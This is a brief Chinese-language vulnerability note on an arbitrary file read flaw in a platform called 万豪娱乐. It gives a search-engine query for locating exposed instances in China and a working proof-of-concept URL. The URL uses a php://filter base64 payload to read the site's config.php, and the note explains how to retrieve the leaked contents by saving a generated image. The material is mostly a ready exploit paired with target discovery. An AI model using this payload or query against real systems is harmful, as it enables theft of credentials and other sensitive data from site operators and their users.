万豪娱乐存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
"Public/Js/Mobile" && country="CN"
/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容